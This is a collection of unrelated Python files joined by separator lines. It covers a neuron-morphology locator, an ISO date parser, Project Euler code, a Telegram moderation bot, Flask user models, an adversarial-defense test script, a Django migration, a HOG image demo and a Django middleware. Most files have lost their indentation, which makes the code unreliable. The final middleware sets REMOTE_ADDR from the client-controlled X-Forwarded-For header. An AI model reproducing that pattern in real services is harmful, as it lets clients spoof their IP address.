# - Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# -------------------------------------------------------------------------------
import numpy as np
import itertools
from morphforge.morphology.visitor.visitorfactory import SectionVistorFactory
from morphforge.morphology.core import MorphLocation
from morphforge.morphology.core import MorphPath
class MorphLocator(object):
@classmethod
def get_locations_at_distance_away_from_dummy(cls, morphology,
distance, section_predicate=None):
dist_to_section_distal = SectionVistorFactory.dict_section_distal_dist_from_soma(morph=morphology)()
# Section predicates: allows us to generate only on a path, region, etc
section_predicate = section_predicate if section_predicate else lambda s:True
locations = []
for section in morphology:
if not section_predicate(section):
continue
if section.is_a_root_section():
if distance < dist_to_section_distal[section]:
locations.append(MorphLocation(section=section, sectionpos=distance/dist_to_section_distal[section]) )
else:
pass
else:
proximal_dist = dist_to_section_distal[section.parent]
distal_dist = dist_to_section_distal[section]
# Does a distance fall on this section:
if proximal_dist <= distance < distal_dist:
prop = (distance - proximal_dist) / (distal_dist - proximal_dist)
assert 0.0 <= prop <= 1.0
locations.append(MorphLocation(section=section, sectionpos=prop))
dummy = MorphLocation(morphology.get_dummy_section().children[0], 0.0)
# Some sanity checking:
for loc in locations:
p = MorphPath(loc, dummy)
assert np.fabs(p.get_length() - distance) < 0.01
return locations
@classmethod
def get_locations_at_distances_away_from_dummy(cls, morphology, distances, section_predicate=None):
return list(itertools.chain(*[cls.get_locations_at_distance_away_from_dummy(morphology, distance, section_predicate=section_predicate) for distance in distances] ))
|
"""Parsing ISO dates.
Originally taken from pyiso8601 (http://code.google.com/p/pyiso8601/)
Modified to match the behavior of dateutil.parser:
- raise ValueError instead of ParseError
- return naive datetimes by default
- uses pytz.FixedOffset
This is the original License:
Copyright (c) 2007 Michael Twomey
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import re
from datetime import datetime, timedelta, timezone, tzinfo
from typing import Mapping, Match, Optional, Pattern, cast
__all__ = ['parse']
# Adapted from http://delete.me.uk/2005/03/iso8601.html
RE_ISO8601: Pattern = re.compile( # noqa
r'(?P<year>[0-9]{4})(-(?P<month>[0-9]{1,2})(-(?P<day>[0-9]{1,2})'
r'((?P<separator>.)(?P<hour>[0-9]{2}):(?P<minute>[0-9]{2})'
r'(:(?P<second>[0-9]{2})(\.(?P<microsecond>[0-9]+))?)?'
r'(?P<timezone>Z|(([-+])([0-9]{2}).?([0-9]{2})))?)?)?)?')
RE_TIMEZONE: Pattern = re.compile(
'(?P<prefix>[+-])(?P<hours>[0-9]{2}).?(?P<minutes>[0-9]{2})$')
class InvalidTZ(Exception):
"""Isoformat date does not have a valid timezone."""
def parse(datetime_string: str) -> datetime:
"""Parse and convert ISO 8601 string into a datetime object."""
m = RE_ISO8601.match(datetime_string)
if not m:
raise ValueError(
f'unable to parse date string {datetime_string!r}')
groups = cast(Mapping[str, str], m.groupdict())
return datetime(
int(groups['year']),
int(groups['month']),
int(groups['day']),
int(groups['hour'] or 0),
int(groups['minute'] or 0),
int(groups['second'] or 0),
int(groups['microsecond'] or 0),
parse_tz(groups['timezone']) if groups['timezone'] else None,
)
def parse_tz(tz: str) -> tzinfo:
if tz == 'Z':
return timezone.utc
match: Optional[Match] = RE_TIMEZONE.match(tz)
if match is not None:
prefix, hours, minutes = match.groups()
return _apply_tz_prefix(prefix, int(hours), int(minutes))
raise InvalidTZ(f'Missing or invalid timezone information: {tz!r}')
def _apply_tz_prefix(prefix: str, hours: int, minutes: int) -> tzinfo:
if prefix == '-':
hours = -hours
minutes = -minutes
return timezone(timedelta(minutes=(minutes + (hours * 60))))
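# A small usage sketch, not part of the original module: as the docstring
# notes, parse() returns a naive datetime when no timezone is given, an aware
# one for 'Z' or an explicit offset, and raises ValueError on unparseable input.
if __name__ == '__main__':
    print(parse('2019-07-01'))                # 2019-07-01 00:00:00 (naive)
    print(parse('2019-07-01T12:30:45Z'))      # 2019-07-01 12:30:45+00:00
    print(parse('2019-07-01T12:30:45+05:30')) # 2019-07-01 12:30:45+05:30
    try:
        parse('not a date')
    except ValueError as exc:
        print('rejected:', exc)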
|
# Project Euler Problem 2
# Find the sum of all the even-valued terms in the Fibonacci sequence which do not exceed four million.
# Holly Becker
# Done 2008-12-20
def main():
a = 1
b = 1
c = a+b
total = 0
while c<4000000:
if c%2==0:
total+=c
a=b
b=c
c=a+b
print(total)
# 2013-05-01
def even_fibonacci():
(a, b) = (0,1)
c = a + b
while c < 4e6:
if c % 2 == 0:
yield a+b
(a, b) = (b, a + b)
c = a + b
def attempt_two():
print((sum(even_fibonacci())))
# This may be a small improvement. The Fibonacci series is:
# 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610...
# Now, replacing an odd number with O and an even one with E, we get:
# O, O, E, O, O, E, O, O, E, O, O, E, O, O, E...
# So every third number is even and we don't need to calculate the odd numbers. Starting from two odd terms x, y, the series is:
# x, y, x + y, x + 2y, 2x + 3y, 3x + 5y
def another_even_fibonacci():
(a, b) = (1,1)
while a+b < 4e6:
yield a+b
(a, b) = (a + 2*b, 2*a + 3*b)
def attempt_three():
print((sum(another_even_fibonacci())))
|
from decorators import group
from db.models.group import Group
from telepot.exception import TelegramError
from db.queries import get_max_warns, get_user, group_exist, user_exist
from db.inserts import (set_welcome_msg, addto_db, commit_and_close, set_rules, set_chat_link,
warn_user, set_max_warn, unwarn_user, add_user, remove_from_db)
class AdminCmd(object):
'''
This class represents the admin commands
'''
def __init__(self, bot, metadata, tycot):
self.bot = bot
self.metadata = metadata
self.tycot = tycot
super().__init__()
@group.only
def start(self):
'''
Register the group into the database
'''
if not group_exist(self.metadata['chat_id']):
addto_db(Group(self.metadata['chat_name'], self.metadata['chat_id']))
commit_and_close()
self.bot.sendMessage(self.metadata['chat_id'], 'Seu grupo foi cadastrado com sucesso!',
reply_to_message_id=self.metadata['msg_id'])
else:
self.bot.sendMessage(self.metadata['chat_id'], '<b>Seu grupo já está cadastrado!</b>',
parse_mode='HTML',
reply_to_message_id=self.metadata['msg_id'])
@group.only
def defwelcome(self, msg):
set_welcome_msg(self.metadata['chat_id'],
msg.replace("/defwelcome ", ""))
self.bot.sendMessage(self.metadata['chat_id'],
'A mensagem de boas-vindas foi alterada com sucesso!',
reply_to_message_id=self.metadata['msg_id'])
@group.only
def defrules(self, msg):
set_rules(self.metadata['chat_id'],
msg.replace("/defregras ", ""))
self.bot.sendMessage(self.metadata['chat_id'],
'As novas regras foram salvas com sucesso!',
reply_to_message_id=self.metadata['msg_id'])
@group.only
def ban(self, msg):
'''
Ban the user from the group. if the user is an admin send a warning message.
'''
user_first_name = self.metadata['rpl_first_name']
user_id = self.metadata['rpl_user_id']
msg_id = self.metadata['rpl_msg_id']
try:
self.bot.kickChatMember(self.metadata['chat_id'], user_id)
self.bot.sendMessage(self.metadata['chat_id'],
f'<b>{user_first_name}</b> foi retirado do grupo.',
parse_mode='HTML', reply_to_message_id=msg_id)
except TelegramError:
self.bot.sendMessage(self.metadata['chat_id'],
f'<b>Não posso banir administradores!</b>', parse_mode='HTML',
reply_to_message_id=msg_id)
@group.only
def deflink(self, msg):
''' See: https://core.telegram.org/bots/api#exportchatinvitelink'''
if self.metadata['chat_type'] == 'supergroup':
self.bot.sendMessage(self.metadata['chat_id'],
'Link já foi definido por padrão.',
reply_to_message_id=self.metadata['msg_id'])
else:
set_chat_link(self.metadata['chat_id'],
msg.replace("/deflink ", ""))
self.bot.sendMessage(self.metadata['chat_id'],
'Link do grupo salvo com sucesso!',
reply_to_message_id=self.metadata['msg_id'])
@group.only
def maxwarn(self, msg):
set_max_warn(self.metadata['chat_id'],
msg.replace("/defmaxwarn ", ""))
self.bot.sendMessage(self.metadata['chat_id'],
'Total de advertencias salvas com sucesso!',
reply_to_message_id=self.metadata['msg_id'])
def _kick_user(self, user, group_max_warn):
user_name = user.user_name
if user.total_warns == group_max_warn:
self.bot.sendMessage(self.metadata['chat_id'],
f'<b>{user_name}</b> expulso por atingir o limite de advertencias.',
parse_mode='HTML',
reply_to_message_id=self.metadata['rpl_msg_id'])
remove_from_db(user)
self.bot.kickChatMember(self.metadata['chat_id'], self.metadata['rpl_user_id'])
@group.only
def warn(self):
first_name = self.metadata['rpl_first_name']
user_id = self.metadata['rpl_user_id']
msg_id = self.metadata['rpl_msg_id']
if user_id in self.tycot.admins_ids:
self.bot.sendMessage(self.metadata['chat_id'],
(f'<b>{first_name}</b> é um dos administradores.\n'
'Não posso advertir administradores.'), parse_mode='HTML',
reply_to_message_id=self.metadata['msg_id'])
else:
if not user_exist(self.metadata['chat_id'], user_id):
user = add_user(first_name, user_id, self.metadata['chat_id'])
user = get_user(user_id)[0]
group_max_warns = get_max_warns(self.metadata['chat_id'])
warn_user(self.metadata['chat_id'], user_id)
self.bot.sendMessage(self.metadata['chat_id'],
(f'{first_name} <b>foi advertido'
f' ({user.total_warns}/{group_max_warns})</b>.'),
parse_mode='HTML',
# reply_markup=self.keyboard_warn(user_id),
reply_to_message_id=msg_id)
self._kick_user(user, group_max_warns)
@group.only
def unwarn(self):
first_name = self.metadata['rpl_first_name']
user_id = self.metadata['rpl_user_id']
msg_id = self.metadata['rpl_msg_id']
if user_id in self.tycot.admins_ids:
self.bot.sendMessage(self.metadata['chat_id'],
'Administradores não possuem advertências.',
reply_to_message_id=self.metadata['msg_id'])
else:
user = get_user(user_id)[0] # get the user from db
if user.total_warns == 0:
self.bot.sendMessage(self.metadata['chat_id'],
f'<b>{first_name}</b> não possui advertencias.',
parse_mode='HTML',
reply_to_message_id=msg_id)
else:
unwarn_user(self.metadata['chat_id'], user_id)
self.bot.sendMessage(self.metadata['chat_id'], f'<b>{first_name} foi perdoado.</b>',
parse_mode='HTML',
reply_to_message_id=msg_id)
|
from flask import current_app
from flask_login import UserMixin, AnonymousUserMixin
from werkzeug.security import generate_password_hash, check_password_hash
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer, \
BadSignature, SignatureExpired
from .. import db, login_manager
from sqlalchemy import or_, desc, func
from ..models import Ratings
import operator
class Permission:
GENERAL = 0x01
VENDOR = 0x02
MERCHANT = 0x04
ADMINISTER = 0x08
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
index = db.Column(db.String(64))
default = db.Column(db.Boolean, default=False, index=True)
permissions = db.Column(db.Integer)
users = db.relationship('User', backref='role', lazy='dynamic')
@staticmethod
def insert_roles():
roles = {
'Merchant': (
Permission.GENERAL | Permission.MERCHANT, 'merchant', False
),
'Vendor': (
Permission.GENERAL | Permission.VENDOR, 'vendor', False
),
'Administrator': (
Permission.ADMINISTER, 'admin', False
)
}
for r in roles:
role = Role.query.filter_by(name=r).first()
if role is None:
role = Role(name=r)
role.permissions = roles[r][0]
role.index = roles[r][1]
role.default = roles[r][2]
db.session.add(role)
db.session.commit()
def __repr__(self):
return '<Role \'%s\'>' % self.name
class User(UserMixin, db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
confirmed = db.Column(db.Boolean, default=False)
first_name = db.Column(db.String(1000), index=True)
last_name = db.Column(db.String(1000), index=True)
email = db.Column(db.String(1000), unique=True, index=True)
ratings = db.relationship("Ratings", backref="users", lazy="dynamic", cascade='all, delete-orphan')
password_hash = db.Column(db.String(128))
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
tutorial_completed = db.Column(db.Boolean, default=False)
# polymorphism
user_type = db.Column(db.String(32), nullable=False, default='user')
__mapper_args__ = {
'polymorphic_identity': 'user',
'polymorphic_on': user_type
}
# application-specific profile fields
description = db.Column(db.String(128), default='')
handles_credit = db.Column(db.Boolean, default=True)
handles_cash = db.Column(db.Boolean, default=True)
def __init__(self, **kwargs):
super(User, self).__init__(**kwargs)
def full_name(self):
return '%s %s' % (self.first_name, self.last_name)
def can(self, permissions):
return self.role is not None and \
(self.role.permissions & permissions) == permissions
def is_admin(self):
return self.can(Permission.ADMINISTER)
def is_vendor(self):
return self.can(Permission.VENDOR)
def is_merchant(self):
return self.can(Permission.MERCHANT)
def is_merchant_or_vendor(self):
return self.can(Permission.MERCHANT) or self.can(Permission.VENDOR)
@property
def password(self):
raise AttributeError('`password` is not a readable attribute')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
def generate_confirmation_token(self, expiration=604800):
"""Generate a confirmation token to email a new user."""
s = Serializer(current_app.config['SECRET_KEY'], expiration)
return s.dumps({'confirm': self.id})
def generate_email_change_token(self, new_email, expiration=3600):
"""Generate an email change token to email an existing user."""
s = Serializer(current_app.config['SECRET_KEY'], expiration)
return s.dumps({'change_email': self.id, 'new_email': new_email})
def generate_password_reset_token(self, expiration=3600):
"""
Generate a password reset change token to email to an existing user.
"""
s = Serializer(current_app.config['SECRET_KEY'], expiration)
return s.dumps({'reset': self.id})
def confirm_account(self, token):
"""Verify that the provided token is for this user's id."""
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except (BadSignature, SignatureExpired):
return False
if data.get('confirm') != self.id:
return False
self.confirmed = True
db.session.add(self)
return True
def change_email(self, token):
"""Verify the new email for this user."""
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except (BadSignature, SignatureExpired):
return False
if data.get('change_email') != self.id:
return False
new_email = data.get('new_email')
if new_email is None:
return False
if self.query.filter_by(email=new_email).first() is not None:
return False
self.email = new_email
db.session.add(self)
return True
def reset_password(self, token, new_password):
"""Verify the new password for this user."""
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except (BadSignature, SignatureExpired):
return False
if data.get('reset') != self.id:
return False
self.password = new_password
db.session.add(self)
return True
@staticmethod
def generate_fake(count=100, **kwargs):
"""Generate a number of fake users for testing."""
from sqlalchemy.exc import IntegrityError
from random import seed, choice
from faker import Faker
fake = Faker()
roles = Role.query.all()
seed()
for i in range(count):
role = choice(roles)
if role.index == 'merchant':
u = Merchant(
first_name=fake.first_name(),
last_name=fake.last_name(),
email=fake.email(),
password=fake.password(),
confirmed=True,
role=choice(roles),
**kwargs
)
elif role.index == 'vendor':
u = Vendor(
first_name=fake.first_name(),
last_name=fake.last_name(),
email=fake.email(),
password=fake.password(),
confirmed=True,
role=choice(roles),
**kwargs
)
else:
u = User(
first_name=fake.first_name(),
last_name=fake.last_name(),
email=fake.email(),
password=fake.password(),
confirmed=True,
role=choice(roles),
**kwargs
)
db.session.add(u)
try:
db.session.commit()
except IntegrityError:
db.session.rollback()
@staticmethod
def user_search(**kwargs):
""" Returns all users matching criteria"""
filter_list = []
if 'main_search_term' in kwargs:
term = kwargs['main_search_term']
if " " in (term.strip()):
array_term = term.split(' ', 1) # split into first and last name
filter_list.append(or_(User.first_name.like('%{}%'.format(array_term[0])),
User.last_name.like('%{}%'.format(array_term[1]))))
else:
filter_list.append(or_(User.first_name.like('%{}%'.format(term)),
User.last_name.like('%{}%'.format(term))))
if 'company_search_term' in kwargs and kwargs['company_search_term']:
term = kwargs['company_search_term']
vendors = Vendor.query.filter(Vendor.company_name.like('%{}%'.format(term))).all()
vendor_ids = [vendor.id for vendor in vendors]
if len(vendor_ids) > 0:
filter_list.append(User.id.in_(vendor_ids))
if 'company_search_term' in kwargs and kwargs['company_search_term']:
term = kwargs['company_search_term']
merchants = Merchant.query.filter(Merchant.company_name.like('%{}%'.format(term))).all()
merchant_ids = [merchant.id for merchant in merchants]
if len(merchant_ids) > 0:
filter_list.append(User.id.in_(merchant_ids))
if 'user_type' in kwargs:
user_criteria = kwargs['user_type']
format(user_criteria)
if user_criteria == "merchant":
filter_list.append(User.user_type == "merchant")
elif user_criteria == "vendor":
filter_list.append(User.user_type == "vendor")
elif user_criteria == "merchant_vendor":
filter_list.append(or_(User.user_type == "merchant",
User.user_type == "vendor"))
elif user_criteria == "admin":
filter_list.append(User.role_id == 2)
else:
                pass
filtered_query = User.query.filter(*filter_list)
if 'sort_by' in kwargs and kwargs['sort_by']:
sort = kwargs['sort_by']
format(sort)
else:
sort = None
if sort == "alphaAZ":
sorted_query = filtered_query.order_by(func.lower(User.last_name))
elif sort == "alphaZA":
sorted_query = filtered_query.order_by(desc(func.lower(User.last_name)))
else: # default sort
sorted_query = filtered_query.order_by(func.lower(User.last_name))
return sorted_query
def __repr__(self):
return '<User \'%s\'>' % self.full_name()
class AnonymousUser(AnonymousUserMixin):
def can(self, _):
return False
def is_admin(self):
return False
def is_vendor(self):
return False
def is_merchant(self):
return False
def is_merchant_or_vendor(self):
return False
class Vendor(User):
__mapper_args__ = {'polymorphic_identity': 'vendor'}
id = db.Column(db.Integer, db.ForeignKey('users.id'), primary_key=True)
# are the vendor's prices visible to other vendors?
visible = db.Column(db.Boolean, default=False)
listings = db.relationship("Listing", backref="vendor", lazy="dynamic", cascade='all, delete-orphan')
company_name = db.Column(db.String(64), default="")
# public profile information
bio = db.Column(db.String(1000), default="")
address = db.Column(db.String(64), default="")
phone_number = db.Column(db.String(64), default="")
website = db.Column(db.String(64), default="")
public_email = db.Column(db.String(64), default="")
image = db.Column(db.String(64), default="")
pdf = db.Column(db.String(64), default="")
f1 = db.Column(db.String(1000), default="")
tags = db.relationship("TagAssociation", back_populates="vendor", cascade='all, delete-orphan')
orders = db.relationship("Order", backref="vendor", cascade='all, delete-orphan')
product_id_col = db.Column(db.String(64), default="ProductID")
ratings_vendor = db.relationship("Ratings", backref="vendor", cascade='all, delete-orphan')
listing_description_col = db.Column(db.String(64), default="Description")
price_col = db.Column(db.String(64), default="Price")
name_col = db.Column(db.String(64), default="Name")
unit_col = db.Column(db.String(64), default="Unit")
quantity_col = db.Column(db.String(64), default="Quantity")
def get_tags(self):
return [str(tag.tag.tag_name) for tag in self.tags]
def __init__(self, **kwargs):
super(Vendor, self).__init__(**kwargs)
self.visible = kwargs.get('visible', False)
self.role = Role.query.filter_by(index='vendor').first()
def __repr__(self):
return '<Vendor %s>' % self.full_name()
def get_rating_value(self):
ratings = Ratings.query.filter_by(vendor_id=self.id).all()
if not ratings:
return -1.0
total_rating = 0.0
for rating in ratings:
total_rating += rating.star_rating
return '%.1f' % (total_rating / len(ratings))
def get_all_ratings(self):
ratings = Ratings.query.filter_by(vendor_id=self.id).all()
ratings.sort(key=lambda r: r.date_reviewed, reverse=True)
return ratings
def get_ratings_query(self):
ratings = Ratings.query.filter_by(vendor_id=self.id)
sorted_ratings = ratings.order_by(desc(Ratings.date_reviewed))
return sorted_ratings
def get_ratings_breakdown(self):
ratings = Ratings.query.filter_by(vendor_id=self.id)
ratings_breakdown = {"1.0": 0, "2.0": 0, "3.0": 0, "4.0": 0, "5.0": 0}
for rating in ratings:
ratings_breakdown[rating.star_rating] = ratings_breakdown.get(rating.star_rating, 0) + 1
return ratings_breakdown
@staticmethod
def get_vendor_by_user_id(user_id):
return Vendor.query.filter_by(id=user_id).first()
class Merchant(User):
__mapper_args__ = {'polymorphic_identity': 'merchant'}
id = db.Column(db.Integer, db.ForeignKey('users.id'), primary_key=True)
cart_items = db.relationship("CartItem", backref="users", lazy="dynamic", cascade='all, delete-orphan')
orders = db.relationship("Order", backref="merchant", lazy="dynamic", cascade='all, delete-orphan')
company_name = db.Column(db.String(64), default="")
def get_cart_listings(self):
return [cart_item.listing for cart_item in self.cart_items]
def get_cart_item(self, listing_id):
""" Returns a cart_item based on its listing_id """
for cart_item in self.cart_items:
if cart_item.listing.id == listing_id:
return cart_item
return None
def __init__(self, **kwargs):
super(Merchant, self).__init__(**kwargs)
self.role = Role.query.filter_by(index='merchant').first()
def __repr__(self):
return '<Merchant %s>' % self.full_name()
login_manager.anonymous_user = AnonymousUser
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
|
"""
Created on Fri Jan 07 20:53:58 2022
@author: Ankit Bharti
"""
from unittest import TestCase, main
from cuboid_volume import *
class TestCuboid(TestCase):
def test_volume(self):
self.assertAlmostEqual(cuboid_volume(2), 8)
self.assertAlmostEqual(cuboid_volume(1), 1)
self.assertAlmostEqual(cuboid_volume(0), 0)
def test_input_value(self):
self.assertRaises(TypeError, cuboid_volume, 'ank')
def test_addition(self):
self.assertEqual(add(3, 4), 7)
self.assertAlmostEqual(add(4.5, 6.2), 10.701, places=2)
def test_addition_input_value(self):
self.assertRaises(TypeError, add, 'ank', 6)
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# **************************************
# @Time : 2018/11/13 10:16
# @Author : Xiang Ling
# @Lab : nesa.zju.edu.cn
# @File : RT_Test.py
# **************************************
import argparse
import os
import random
import sys
import numpy as np
import torch
sys.path.append('%s/../' % os.path.dirname(os.path.realpath(__file__)))
from RawModels.MNISTConv import MNISTConvNet
from RawModels.ResNet import resnet20_cifar
from RawModels.Utils.dataset import get_mnist_test_loader, get_cifar10_test_loader
from Defenses.DefenseMethods.RT import RTDefense
def main(args):
# Device configuration
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_index
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# Set the random seed manually for reproducibility.
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
torch.manual_seed(args.seed)
if torch.cuda.is_available():
torch.cuda.manual_seed(args.seed)
np.random.seed(args.seed)
random.seed(args.seed)
batch_size = 200
model_location = '{}/{}/model/{}_raw.pt'.format('../RawModels', args.dataset, args.dataset)
# Get training parameters, set up model frameworks and then get the train_loader and test_loader
dataset = args.dataset.upper()
assert dataset == 'MNIST' or dataset == 'CIFAR10'
if dataset == 'MNIST':
raw_model = MNISTConvNet().to(device)
test_loader = get_mnist_test_loader(dir_name='../RawModels/MNIST/', batch_size=batch_size)
else:
raw_model = resnet20_cifar().to(device)
test_loader = get_cifar10_test_loader(dir_name='../RawModels/CIFAR10/', batch_size=batch_size)
raw_model.load(path=model_location, device=device)
defense_name = 'RT'
rt = RTDefense(model=raw_model, defense_name=defense_name, dataset=dataset, device=device)
# predicting the testing dataset using the randomization transformation defense
raw_model.eval()
total = 0.0
correct = 0.0
with torch.no_grad():
for index, (images, labels) in enumerate(test_loader):
# input images first go through the randomization transformation layer and then the resulting images are feed into the original model
transformed_images = rt.randomization_transformation(samples=images, original_size=images.shape[-1], final_size=args.resize)
outputs = raw_model(transformed_images)
labels = labels.to(device)
_, predicted = torch.max(outputs.data, 1)
total = total + labels.size(0)
correct = correct + (predicted == labels).sum().item()
ratio = correct / total
print('\nTest accuracy of the {} model on the testing dataset: {:.1f}/{:.1f} = {:.2f}%\n'.format(raw_model.model_name, correct, total,
ratio * 100))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='The RT Defenses')
parser.add_argument('--dataset', type=str, default='CIFAR10', help='the dataset (MNIST or CIFAR10)')
parser.add_argument('--seed', type=int, default=100, help='the default random seed for numpy and torch')
parser.add_argument('--gpu_index', type=str, default='0', help="gpu index to use")
# parameters for the RT Defense
parser.add_argument('--resize', type=int, default=36, help='the final size for the randomization transformation')
arguments = parser.parse_args()
main(arguments)
|
# Generated by Django 3.0.4 on 2020-03-29 12:26
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='IletisimModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('adi', models.CharField(max_length=100)),
('soyadi', models.CharField(max_length=100)),
('email', models.EmailField(max_length=254)),
('yazi', models.TextField()),
('zaman', models.DateTimeField(default=django.utils.timezone.now)),
('degerlendirme', models.CharField(choices=[('5', 'Çok İyi'), ('4', 'İyi'), ('3', 'Kararsızım'), ('2', 'Kötü'), ('1', 'Çok Kötü')], max_length=10)),
],
),
]
|
"""
Histogram of Oriented Gradients
Based on:
https://scikit-image.org/docs/dev/auto_examples/features_detection/plot_hog.html
"""
import matplotlib.pyplot as plt
from skimage import exposure, io
from skimage.feature import hog
image1 = io.imread("image.png")
fd, hog_image = hog(image1,
orientations=8,
pixels_per_cell=(16, 16),
cells_per_block=(1, 1),
visualize=True,
multichannel=True)
# Rescale histogram for better display
hog_image_rescaled = exposure.rescale_intensity(hog_image, in_range=(0, 10))
plt.rcParams['figure.figsize'] = [10, 10]
f, axarr = plt.subplots(1, 2, figsize=(6, 6), sharex=True)
f.subplots_adjust(hspace=0.1, wspace=0.01)
axarr[0].axis('off')
axarr[0].imshow(image1, cmap='gray')
axarr[0].set_title('Input image')
axarr[1].axis('off')
axarr[1].imshow(hog_image_rescaled, cmap='gray')
axarr[1].set_title('HOG')
plt.imsave('hog_target.jpg', hog_image_rescaled, cmap='gray')
|
class RemoteAddrMiddleware(object):
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
self.process_request(request)
response = self.get_response(request)
# Code to be executed for each request/response after
# the view is called.
return response
def process_request(self, request):
if 'HTTP_X_FORWARDED_FOR' in request.META:
ip = request.META['HTTP_X_FORWARDED_FOR'].split(',')[0].strip()
request.META['REMOTE_ADDR'] = ip
|